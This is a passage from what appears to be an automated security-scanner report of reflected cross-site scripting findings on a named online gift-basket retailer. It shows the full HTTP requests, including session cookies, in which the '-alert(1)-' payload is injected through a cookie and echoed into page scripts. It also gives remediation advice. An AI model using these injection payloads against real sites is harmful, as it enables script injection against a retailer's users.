Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /product.do?baseCode=93260&dataset=11309 HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/template.do?id=template3&page=2000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000MKdbdCo70zXsBXxIys-COzm:-1; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e6184c266'-alert(1)-'ef80968ac09; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.1.10.1304903358; cmTPSet=Y; CMAVID=70091303843240316067555; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|1|0|0|0|0|0|0|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903358829&t2=1304903368545&t3=1304903441095&lti=1304903441095&ln=&hr=/product.do%3FbaseCode%3D93260%26dataset%3D11309&fti=&fn=searchform%3A0%3BUNDEFINED%3A1%3B&ac=&fd=&uer=&fu=&pi=18B%3Atemplate-The%20Popcorn%20Factory&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800baskets.com/template.do%3Fid%3Dtemplate3%26page%3D2000&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:19:00 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 83754


                                                <html xmlns="http://www.w3.org/1999/xhtml"
    xmlns:og="http://ogp.me/ns#"
    xmlns:fb="http://www.face
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e6184c266'-alert(1)-'ef80968ac09');

lpAddVars('page','pageid','product');

//-->
...[SNIP]...

4.201. http://ww30.1800baskets.com/product.do [ShopperManagerEnterprise cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /product.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a76bd'-alert(1)-'3d6fc46faa6e9ceca was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /product.do?delDateColl=&personalizable=false&submitForm=&personalComment=&personalCount=&generalProductDataset=11097&hospitalDataset=11096&funeralHomeDataset=11092&ruralRouteDataset=11093&dataset=11309&channel=&landing=&cm_cid=&sku=93260&quantity=1&recipient=-3&international=false&sympathy=false&zipCode=10010&recipientText=&recipient=-3&productType=GPT&locationCode=1&deliveryDate=Friday%2C+May.+20th&deliveryMonth=5&deliveryDay=20&deliveryYear=2011&baseCode=93260&actionEvent=upgrade&flexFlag=false&gptCode=geoSellCode&showAddon=&deliveryDateSelect=&setAlternates=&showAlternates=&contextPageType=PRODUCT&surchargeOnlyOptionId=&flexValue=&flexOptionId=&isGeoSell=false HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
Cache-Control: max-age=0
Origin: http://ww30.1800baskets.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618a76bd'-alert(1)-'3d6fc46faa6e9ceca; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; cmTPSet=Y; CMAVID=70091303843240316067555; __unam=bbc31a8-12fd24e67c1-26d7039-1; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.2.10.1304903358; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; JSESSIONID=0000jc-mR2VDw7uBY5v5sZbAO-H:-1; CoreAt=90074784=1|2|0|0|0|0|0|1|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903446336&t2=1304903453532&t3=1304903458838&t4=1304903443093&lti=1304903458838&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304903458845&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A22%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20The%20Popcorn%20Factory%20Party%20Pup%20Snack%20Tin%20%2893260%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:29:00 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000XUNWu9J-txAe1nRFBC2FfiX:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 31981


           <html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expir
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e618a76bd'-alert(1)-'3d6fc46faa6e9ceca');

lpAddVars('page','pageid','shoppingbasket');

//-->
...[SNIP]...

4.202. http://ww30.1800baskets.com/shoppingbasket.do [ShopperManagerEnterprise cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /shoppingbasket.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2533'-alert(1)-'2e3adfed67e was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shoppingbasket.do HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618c2533'-alert(1)-'2e3adfed67e; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; cmTPSet=Y; CMAVID=70091303843240316067555; __unam=bbc31a8-12fd24e67c1-26d7039-1; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.2.10.1304903358; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|2|0|0|0|0|0|1|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903446336&t2=1304903453532&t3=1304903458838&t4=1304903443093&lti=1304903458838&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304903458845&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A22%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20The%20Popcorn%20Factory%20Party%20Pup%20Snack%20Tin%20%2893260%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784; JSESSIONID=0000a4jGFqAQQsPqkpo4AlBHArV:-1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:20:34 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 31975


           <html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expir
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e618c2533'-alert(1)-'2e3adfed67e');

lpAddVars('page','pageid','shoppingbasket');

//-->
...[SNIP]...

4.203. http://ww30.1800baskets.com/shoppingbasket.do [ShopperManagerEnterprise cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /shoppingbasket.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8869'-alert(1)-'6549178ccfff42aec was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shoppingbasket.do?actionEvent=PayPalCheckout&cartItem%280%29.type=0&cartItem%280%29.itemId=5687d050-633d-4bcd-8079-f1cfa4a09ce8&cartItem%280%29.groupId=0&cartItem%280%29.flexO